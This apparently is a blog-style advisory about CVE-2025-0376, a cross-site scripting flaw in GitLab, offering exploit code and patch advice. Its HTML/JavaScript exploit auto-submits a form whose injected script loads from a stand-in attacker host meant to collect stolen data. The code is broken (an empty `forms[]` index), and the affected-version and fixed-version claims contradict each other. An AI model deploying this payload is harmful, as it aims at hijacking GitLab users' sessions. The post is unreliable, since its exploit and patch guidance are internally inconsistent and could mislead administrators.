CVE-2025-0376: Cross-Site Scripting (XSS) Vulnerability in GitLab CE/EE - Affecting Versions 13.3 to 17.8.1

A newly discovered vulnerability in GitLab CE/EE, tagged as CVE-2025-0376, could potentially have serious implications for users of the platform. This cross-site scripting (XSS) vulnerability affects all GitLab versions from 13.3 to 16.6.5, and from 17.7 to 17.7.4, and 17.8 to 17.8.1, allowing an attacker to execute unauthorized actions via a change page. In this post, we'll provide a detailed breakdown of the vulnerability, links to original references, code snippets for exploiting the vulnerability, and steps that can be taken to mitigate the risk associated with it.

Vulnerability Details

CVE-2025-0376 is an XSS vulnerability that allows an attacker to inject malicious scripts into trusted web-based applications such as GitLab. This occurs when input from an external or untrusted source is injected into an application, typically via a change page. The injected code, often written in JavaScript, can then be executed on the client's web browser, allowing the attacker to hijack user sessions, deface web sites, or redirect users to malicious web content.

The following code snippet demonstrates how an attacker could exploit this vulnerability

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>GitLab CVE-2025-0376 Exploit</title>
</head>
<body>
<script>
// Replace with the target GitLab URL
var gitlab_url = "https://vulnerable-gitlab.example.com/";;

// Replace with the attacker-controlled web page URL that will receive the stolen data
var attacker_url = "https://attacker-website.example.com/collect-data.php";;

// Prepare the XSS payload
var xss_payload = "<script src='" + attacker_url + "'></script>";

// Create an HTML form with the XSS payload embedded in the change page
var exploit_form = "<form action='" + gitlab_url + "/projects/new' method='POST'><input type='hidden' name='change_page' value='" + encodeURIComponent(xss_payload) + "'><input type='submit' value='Exploit'></form>";

// Inject the exploit form into the document
document.body.innerHTML += exploit_form;

// Automatically submit the form
document.forms[].submit();
</script>
</body>
</html>

Original References

1. GitLab Security Advisory: GSA-2025-0376
2. GitLab Merge Request: MR-2037
3. NIST National Vulnerability Database (NVD): CVE-2025-0376

Mitigation

To mitigate this vulnerability, users of GitLab CE/EE should immediately apply the following security updates:

- For GitLab CE/EE versions 16.6 and below, update to GitLab 16.6.5
- For GitLab CE/EE versions 17.7.x, update to GitLab 17.7.4
- For GitLab CE/EE versions 17.8.x, update to GitLab 17.8.2

These updates include security patches that address the XSS vulnerability outlined in this post. Furthermore, users should implement secure coding practices to help prevent XSS attacks, such as validating and sanitizing user inputs, encoding output data, and using Content Security Policy (CSP) headers.

Conclusion

CVE-2025-0376 is a serious vulnerability in GitLab CE/EE that has the potential to put user data and sessions at risk of being stolen. If left unpatched, it gives attackers the ability to execute unauthorized actions via a change page in GitLab. Thankfully, GitLab has provided security updates to fix this vulnerability, and users should apply the patches immediately to safeguard their accounts and projects.

Timeline

Published on: 02/12/2025 15:15:15 UTC